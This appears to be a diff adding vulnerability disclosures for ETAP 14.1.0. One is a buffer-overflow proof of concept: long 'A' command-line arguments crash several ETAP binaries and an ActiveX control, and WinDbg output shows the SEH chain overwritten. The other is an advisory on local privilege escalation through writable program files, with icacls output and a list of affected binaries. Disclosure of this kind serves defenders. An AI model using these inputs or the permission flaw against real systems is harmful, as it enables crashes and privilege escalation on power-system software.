AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!) 
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe - +eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000 +eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ra!CFileMap::operator=+0x786: +00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341 +0:000> !exchain +0018ff3c: ra!CFileMap::GetLength+7b21 (00410041) +Invalid exception stack at 00410041 +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786 +0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f +0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2 +0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff7c 00410041 00410041 
00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +.. +0:000> d esi +005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . . +005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. + + +=============================== + + +C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +STATUS_STACK_BUFFER_OVERRUN encountered +(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for SFA.exe - +kernel32!GetProfileStringW+0x12cc9: +75150265 cc int 3 + + +=============================== + + +C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +STATUS_STACK_BUFFER_OVERRUN encountered +(380c.3cc4): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll - +*** WARNING: Unable to verify checksum for SO3Ph.exe +*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - +kernel32!UnhandledExceptionFilter+0x71: +00000000`76fcb8c1 cc int 3 +0:000> r +rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000 +rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002 +rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff + r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 +r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000 +r14=000000000012eb00 r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 +kernel32!UnhandledExceptionFilter+0x71: +00000000`76fcb8c1 cc int 3 + + +=============================== + + +C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 
+(36bc.36b8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll - +kernel32!lstrcpyW+0xa: +00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341 +0:000> r +rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000 +rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0 +rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000 + r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000 +r11=0000000000000202 r12=0000000000000000 r13=0000000000000000 +r14=000000000000000a r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +kernel32!lstrcpyW+0xa: +00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341 +0:000> d rax +00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +... 
+0:000> r +rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff +rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1 +rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000 + r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000 +r11=0000000000000202 r12=0000000000000000 r13=0000000000000000 +r14=000000000000000a r15=0000000000000000 +iopl=0 nv up ei ng nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 +KERNELBASE!lstrlenW+0x17: +000007fe`fd0a17c7 66f2af repne scas word ptr [rdi] + + +=============================== + + +COM/ActiveX PoCs: +----------------- + + + + + + + +(2750.243c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll - +eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684 +eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +iPlotLibrary!DllUnregisterServer+0x104e5a: +0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=???????? 
+0:000> d edx +02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + +=============================== + + + + + + diff --git a/platforms/windows/local/39845.txt b/platforms/windows/local/39845.txt new file mode 100755 index 000000000..2cff8a2ab --- /dev/null +++ b/platforms/windows/local/39845.txt 
@@ -0,0 +1,481 @@
+
+Operation Technology ETAP 14.1.0 Local Privilege Escalation
+
+
+Vendor: Operation Technology, Inc.
+Product web page: http://www.etap.com
+Affected version: 14.1.0.0
+
+Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
+is the most comprehensive electrical engineering software platform for the
+design, simulation, operation, and automation of generation, transmission,
+distribution, and industrial systems. As a fully integrated model-driven
+enterprise solution, ETAP extends from modeling to operation to offer a
+Real-Time Power Management System.
+
+Desc: ETAP suffers from an elevation of privileges vulnerability which can
+be used by a simple authenticated user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper permissions,
+with the 'C' flag (Change) for 'Authenticated Users' group.
+
+Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
+ Microsoft Windows 7 Ultimate SP1 (EN) x86_64
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5323
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5323.php
+
+
+07.04.2016
+
+--
+
+
+C:\>icacls "ETAP 1410"
+ETAP 1410 BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(OI)(CI)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M)
+ NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+
+
+C:\ETAP 1410>icacls etaps64.exe
+etaps64.exe BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M)
+
+Successfully processed 1 files; Failed processing 0 files
+
+
+Affected binaries:
+------------------
+
+C:\ETAP 1410>dir
+ Volume in drive C is Windows
+ Volume Serial Number is 56F3-8688
+
+ Directory of C:\ETAP 1410
+
+07/04/2016 11:42 .
+07/04/2016 11:42 ..
+01/02/2016 11:14 766 16COLOR.CUR
+19/01/2016 02:36 238,592 acsdvd.exe
+19/01/2016 02:34 81,920 bifact.dll
+19/01/2016 02:36 7,980,032 ca.exe
+26/02/2016 16:56 1,220,608 cddll64.dll
+19/01/2016 01:48 14,848 ComtradeReader.dll
+17/11/2015 17:54 66,982 configdescriptions.xml
+01/02/2016 11:14 1,620 ContourSetting.ini
+07/04/2016 11:41 Convert
+19/01/2016 02:35 212,992 csdvd.exe
+01/02/2016 11:14 27,136 ctl3d32.dll
+19/01/2016 02:28 112,128 ctrlpb.exe
+27/06/2013 15:17 7,582 Currency.xml
+05/03/2009 12:44 65,536 dao.dll
+07/04/2016 11:41 Datablocks
+26/02/2016 16:35 13,256,192 DATADB.dll
+26/02/2016 16:51 19,252,736 datadb64.dll
+10/08/2015 13:00 2,011,136 DBCompareInstr.mdb
+10/08/2015 13:01 151,552 dbcompareinstr.sdf
+08/10/2010 13:20 503,808 DBCompareOutput.mdb
+05/11/2014 14:45 86,016 DBCompareOutput.sdf
+08/10/2010 13:20 503,808 DBCompareSummary.mdb
+05/11/2014 14:45 28,672 DBCompareSummary.sdf
+19/01/2016 02:31 53,248 DBExtractConsoleApp.exe
+19/01/2016 02:35 896,000 dccalc.exe
+26/02/2016 16:54 352,256 dcspdt64.dll
+26/02/2016 16:55 348,160 dcspst64.dll
+01/02/2016 11:14 229,376 defaultA.mdb
+01/02/2016 11:14 20,971,520 defaulte.mdb
+01/02/2016 11:14 17,657,856 defaultm.mdb
+01/02/2016 11:14 143,360 dunzip32.dll
+01/02/2016 11:14 176,128 dzip32.dll
+01/02/2016 11:14 3,262 e-dpp2.ico
+01/02/2016 11:14 260,942 Electronic License Grant Terms.pdf
+01/02/2016 11:14 315,392 enable40.dll
+09/02/2016 17:38 137,728 enginemsgs.dll
+19/01/2016 02:34 147,456 enginemsgs64.dll
+19/01/2016 02:31 253,952 et2waydataxexcel.exe
+19/01/2016 02:31 135,168 etaccess.exe
+26/02/2016 16:52 3,872,768 ETAnalyzers64.dll
+01/02/2016 11:14 76,999 etap.ico
+25/03/2001 10:56 246,434 etap2csv.exe
+19/01/2016 02:31 54,784 etapcim.dll
+19/01/2016 02:31 1,174,528 EtapDevices.DLL
+19/01/2016 02:31 67,072 EtapGISDevices.dll
+19/01/2016 02:31 14,336 ETAPMongoDB.dll
+26/02/2016 16:24 1,325,568 Etapmsgs.dll
+26/02/2016 16:38 1,335,296 etapmsgs64.dll
+05/02/2016 17:04 49,012,284 etaps.chm
+07/04/2016 11:45 660 ETAPS.INI
+09/12/2003 12:13 88 etaps.pek
+26/02/2016 17:23 86,749,184 etaps64.exe
+22/06/2011 17:40 6,130 ETAPS64.exe.config
+26/02/2016 16:29 23,688,704 etapsdb.dll
+26/02/2016 16:45 26,805,248 etapsdb64.dll
+19/01/2016 02:31 125,440 EtapSmartPlant.exe
+26/06/2015 12:51 24,571,904 etapsqlenglishmodel.bak
+26/06/2015 12:52 24,436,736 etapsqlmetricmodel.bak
+19/01/2016 02:31 52,736 ETAP_CIM.EXE
+01/02/2016 11:14 6,184 etap_dy_.ttf
+19/01/2016 02:31 94,208 etap_edpp.exe
+19/01/2016 02:31 20,480 ETAP_GlobalUtilities.dll
+19/01/2016 02:31 32,768 ETAP_Graphics.dll
+24/06/2015 08:40 9,977,953 etap_overview.pdf
+26/02/2016 16:27 44,032 EtArcFlash.dll
+26/02/2016 16:44 51,712 EtArcFlash64.dll
+19/01/2016 02:31 192,512 etarcgis.exe
+19/01/2016 02:31 192,512 etarcgis92.exe
+19/01/2016 02:31 192,512 etarcgis93.exe
+19/01/2016 02:31 427,520 ETArcGIS_TD.exe
+19/01/2016 02:31 428,544 ETArcGIS_TD10.exe
+26/02/2016 16:54 417,792 etbatt64.dll
+26/02/2016 16:52 614,912 ETBranch64.dll
+26/02/2016 16:26 1,353,728 etcabp.exe
+26/02/2016 16:53 4,139,008 etcb64.dll
+26/02/2016 16:54 1,220,096 etcharg64.dll
+19/01/2016 02:28 307,712 ETConfig.EXE
+14/09/2015 08:44 287 ETConfig.exe.config
+19/01/2016 02:34 68,096 etcp.exe
+19/01/2016 02:31 225,280 etdatamapper.dll
+19/01/2016 02:31 172,032 etdataxexcel.exe
+26/02/2016 16:54 3,728,384 etdc64.dll
+26/02/2016 16:54 433,152 etdcbus64.dll
+26/02/2016 16:54 768,512 etdccb64.dll
+26/02/2016 16:54 970,752 etdced64.dll
+26/02/2016 16:54 406,528 etdcfuse64.dll
+26/02/2016 16:54 334,336 etdcimp64.dll
+26/02/2016 16:54 367,104 etdcknvt64.dll
+26/02/2016 16:54 448,512 etdclmp64.dll
+26/02/2016 16:55 1,019,904 etdcmach64.dll
+26/02/2016 16:54 422,912 etdcstl64.dll
+19/01/2016 02:31 1,228,800 etdevices.dll
+19/01/2016 02:40 150,528 ETDistanceRelay64.dll
+19/01/2016 02:31 135,168 ETDXF.exe
+26/02/2016 16:38 633,344 ETEAView.exe
+01/02/2016 11:14 3,771 ETEAView.exe.config
+19/01/2016 02:31 651,776 ETEZPowerImport.dll
+19/01/2016 02:31 8,192 ETFilter.exe
+19/01/2016 02:31 102,400 etglu.dll
+19/01/2016 02:31 89,088 etglu64.dll
+19/01/2016 02:34 168,448 etgrd.exe
+26/02/2016 16:56 704,000 ethf64.dll
+26/02/2016 16:26 285,184 ETInterchange.exe
+01/02/2016 11:14 3,688 ETInterchange.exe.config
+26/02/2016 16:55 1,471,488 etinvert64.dll
+26/02/2016 16:52 231,936 etlayout64.dll
+26/02/2016 16:44 187,392 etlncalc64.dll
+26/02/2016 16:56 9,623,552 etload64.dll
+19/01/2016 02:31 414,720 ETMergeSync.exe
+19/01/2016 02:28 1,081,344 EtMongoUnmanaged.DLL
+26/02/2016 16:52 292,352 etmtrupd64.dll
+19/01/2016 02:31 51,712 ETMultispeak.exe
+19/01/2016 02:31 73,728 ETPanelRep.exe
+14/09/2015 08:44 3,262 etpanelrep.ico
+26/02/2016 16:52 918,016 etpe64.dll
+26/02/2016 16:45 107,008 ETPlugIn64.dll
+26/02/2016 16:25 42,496 ETPMStatus.EXE
+01/02/2016 11:14 626 ETPMStatus.exe.config
+26/02/2016 16:52 776,192 etprofile64.dll
+19/01/2016 02:28 94,208 etpsmsexcel.exe
+01/02/2016 11:14 2,032 EtPSMSExcel.exe.config
+19/01/2016 02:31 126,976 etrawdata.exe
+26/02/2016 16:52 389,632 etreac64.dll
+26/02/2016 16:27 4,935,680 etrep.dll
+26/02/2016 16:43 6,328,320 etrep64.dll
+19/01/2016 02:31 32,768 ETRepAnalyzer.exe
+19/01/2016 02:32 496,128 ETSkmParser.dll
+26/02/2016 16:36 5,586,432 EtStudyCase.dll
+26/02/2016 16:53 7,607,296 EtStudyCase64.dll
+26/02/2016 16:53 2,739,200 ETTrack64.dll
+26/02/2016 16:26 1,235,968 ettrend.exe
+01/02/2016 11:14 4,348 EtTrend.exe.config
+26/02/2016 16:25 20,480 ettrenddata.dll
+26/02/2016 16:55 1,253,888 etups64.dll
+26/02/2016 16:55 1,185,792 etvfd64.dll
+19/01/2016 02:31 90,112 ET_CATIA.exe
+19/01/2016 02:31 45,056 et_ieee.exe
+07/04/2016 11:44 Example-ANSI
+07/04/2016 11:41 Example-IEC
+07/04/2016 11:41 Example-New
+07/04/2016 11:41 ExcelTemplates
+01/02/2016 11:14 433,230 filter.xml
+01/02/2016 11:14 566 filterall.xml
+03/04/2015 12:50 197,074 FilterDXF.xml
+08/10/2010 13:20 99,171 FilterOpenExcel.xml
+07/04/2016 11:41 Filters
+01/02/2016 11:14 33,363 FilterSync.xml
+19/01/2016 02:34 102,912 fludbl.dll
+07/04/2016 11:42 Formats1400
+07/04/2016 11:42 Formats1410
+19/01/2016 02:34 9,728 gasolve.dll
+04/05/2004 10:53 1,645,320 gdiplus.dll
+26/02/2016 16:25 115,712 grddata.dll
+26/02/2016 16:25 245,248 grdrep.dll
+19/01/2016 02:34 9,050,112 harmonic.exe
+04/11/2004 08:54 471,040 HHActiveX.dll
+26/02/2016 16:25 443,904 ILSEngine.dll
+26/02/2016 16:38 560,128 ilsengine64.dll
+26/02/2016 16:25 81,920 ilsutils.dll
+26/02/2016 16:38 77,824 ILSUtils64.dll
+01/02/2016 11:14 12,170 ILS_Report_Logo.jpg
+01/02/2016 11:14 26,383 ils_snapshot_stylesheet.xsl
+01/02/2016 11:14 45,056 ImageComboBox.dll
+01/02/2016 11:14 148,488 Infragistics.Shared.v2.dll
+01/02/2016 11:14 147,456 Infragistics.Shared.v3.dll
+01/02/2016 11:14 1,074,208 Infragistics.Win.UltraWinGrid.v2.dll
+01/02/2016 11:14 1,241,088 Infragistics.Win.UltraWinGrid.v3.dll
+01/02/2016 11:14 914,456 Infragistics.Win.v2.dll
+01/02/2016 11:14 1,236,992 Infragistics.Win.v3.dll
+05/03/2009 12:44 65,536 Interop.DAO.dll
+01/02/2016 11:14 1,089,536 Interop.Excel.dll
+01/02/2016 11:14 217,088 interop.Microsoft.Office.Core.dll
+03/08/2004 23:56 69,632 interop.msxml.dll
+05/03/2009 12:44 11,776 interop.stdtype.dll
+24/01/2011 04:54 57,344 Interop.VBIDE.dll
+19/01/2016 02:36 1,227,264 LA3PH.exe
+19/01/2016 02:37 4,359,680 LF3PH.exe
+19/01/2016 02:36 4,397,568 LF3PHDLL.dll
+19/01/2016 02:35 6,849,536 lffd.exe
+19/01/2016 02:36 6,247,936 lfgs.exe
+19/01/2016 02:35 6,390,272 lfle.exe
+19/01/2016 02:37 7,419,904 lfnr.exe
+07/04/2016 11:41 lib
+26/02/2016 16:36 1,601,536 libacc.dll
+26/02/2016 16:52 2,033,152 libacc64.dll
+26/02/2016 16:34 29,691,392 libsdll.dll
+26/02/2016 16:50 35,940,864 libsdll64.dll
+19/01/2016 01:49 102,400 lineq.dll
+09/02/2016 17:53 122,368 LinEq64.dll
+26/02/2016 16:24 1,609,216 locetaps.dll
+26/02/2016 16:38 1,701,888 locetaps64.dll
+26/02/2016 16:24 133,632 locetcom.dll
+26/02/2016 16:38 143,872 locetcom64.dll
+01/02/2016 11:14 327,556 Logo.png
+26/02/2016 16:25 105,984 MDBCompare.exe
+01/02/2016 11:14 149 MDBCompare.exe.config
+26/02/2016 16:24 20,480 MDBCompareHelper.dll
+07/12/1999 04:00 995,383 mfc42.dll
+26/02/2016 11:48 7,208,960 mfclog.dll
+26/02/2016 12:01 2,949,120 mfclogb.dll
+26/02/2016 11:57 4,390,912 mfcloge.dll
+16/02/2016 15:41 8,716,288 mfclogl.dll
+26/02/2016 11:48 29,425,664 mfcmdb.dll
+26/02/2016 12:01 26,279,936 mfcmdbb.dll
+26/02/2016 11:57 28,377,088 mfcmdbe.dll
+16/02/2016 15:41 29,425,664 mfcmdbl.dll
+05/10/2013 01:38 23,720 MFCMIFC80.DLL
+26/02/2016 11:48 10,240 mfcoti.dll
+26/02/2016 12:01 10,240 mfcotib.dll
+26/02/2016 11:57 10,240 mfcotie.dll
+16/02/2016 15:41 10,240 mfcotil.dll
+26/09/2013 17:12 331,776 MFCPB.DLL
+26/02/2016 11:42 29,853,696 mfcpso.dll
+26/08/2015 15:54 1,536 mfcpsob.dll
+01/10/2015 08:36 22,067,712 mfcpsoe.dll
+26/08/2015 16:40 22,182,912 mfcpsol.dll
+01/02/2016 11:14 1,100,392 Microsoft.Office.Interop.Excel.dll
+01/02/2016 11:14 781,104 Microsoft.Office.Interop.Word.dll
+01/02/2016 11:14 161,192 Microsoft.Practices.EnterpriseLibrary.Common.dl
+01/02/2016 11:14 91,560 Microsoft.Practices.EnterpriseLibrary.Data.dll
+01/02/2016 11:14 42,408 Microsoft.Practices.EnterpriseLibrary.Logging.D
+01/02/2016 11:14 218,536 Microsoft.Practices.EnterpriseLibrary.Logging.d
+01/02/2016 11:14 64,352 Microsoft.Practices.ObjectBuilder.dll
+01/02/2016 11:14 64,088 Microsoft.Vbe.Interop.dll
+01/02/2016 11:14 379,392 MongoDB.Bson.dll
+01/02/2016 11:14 559,104 MongoDB.Driver.dll
+19/01/2016 02:37 7,927,808 ms.exe
+18/08/2001 04:00 1,388,544 msvbvm60.dll
+29/08/2000 00:00 401,462 Msvcp60.dll
+04/05/2001 11:05 290,869 MSVCRT.DLL
+07/12/1999 04:00 253,952 msvcrt20.dll
+07/12/1999 04:00 65,024 msvcrt40.dll
+19/01/2016 02:36 6,827,008 OCP.exe
+01/02/2016 11:14 223,800 Office.dll
+01/02/2016 11:14 2,429 olhtypicalcurves.xml
+01/02/2016 11:14 6,335 OnlineToolbar.xaml
+01/02/2016 11:14 96,256 Opc.Ua.Client.dll
+19/01/2016 02:28 167,936 Opc.Ua.ClientControls.dll
+01/02/2016 11:14 102,400 Opc.Ua.Configuration.dll
+01/02/2016 11:14 91,564 Opc.Ua.Configuration.xml
+01/02/2016 11:14 2,970,624 Opc.Ua.Core.dll
+01/02/2016 11:14 5,606,536 Opc.Ua.Core.xml
+19/01/2016 02:29 112,128 OPCEPICS.exe
+19/01/2016 02:36 6,549,504 opf.exe
+07/04/2016 11:41 Other
+19/01/2016 02:28 336,896 Oti.UAToolkit.dll
+26/02/2016 16:38 108,544 otiAGCView.dll
+26/02/2016 16:25 132,096 otibin.dll
+26/02/2016 16:24 106,496 oticommon.dll
+26/02/2016 16:38 102,400 oticommon64.dll
+26/02/2016 16:38 77,824 oticonfig.dll
+26/02/2016 16:38 9,728 oticonfig.xmlserializers.dll
+26/02/2016 16:38 167,936 OTIContingency.dll
+24/11/2015 18:54 121,344 OtiContourConfig.exe
+26/02/2016 16:28 263,680 OtiDistanceRelay.dll
+26/02/2016 16:44 263,168 OtiDistanceRelay64.dll
+26/02/2016 16:55 1,660,928 OtiDistribDataManager64.dll
+26/02/2016 16:44 84,992 OTIDistribution.dll
+26/02/2016 16:26 124,928 OTIEA.DLL
+26/02/2016 16:38 8,704 OtiEmfToXaml.exe
+26/02/2016 16:38 17,920 OtiExcelReport.dll
+26/02/2016 17:22 4,165,632 otigraph.dll
+26/02/2016 16:38 161,280 otigraph.xmlserializers.dll
+26/02/2016 16:28 634,368 OtiGridView.dll
+26/02/2016 16:43 638,976 OtiGridView64.dll
+26/02/2016 16:25 613,888 OtiInterchange.dll
+26/02/2016 16:25 36,864 OtiInterchange.XMLSerializers.DLL
+26/02/2016 16:38 613,376 OtiInterchange64.dll
+19/01/2016 02:31 183,296 OTIKmlToGis.exe
+26/02/2016 16:38 239,104 otilayermanager.dll
+26/02/2016 16:38 205,824 OtiLibrary.dll
+26/02/2016 16:26 949,760 OtiManage.dll
+26/02/2016 16:39 1,397,248 otimanage64.dll
+26/02/2016 16:38 72,704 OtiManagedDlg64.dll
+26/02/2016 16:25 25,600 otimdbtosql.exe
+26/02/2016 16:25 398,336 otimf32.exe
+26/02/2016 16:25 12,288 OtiMongoConvert.exe
+26/02/2016 16:38 133,632 OtiMongoManaged.dll
+26/02/2016 16:25 29,696 OTIOpCon.DLL
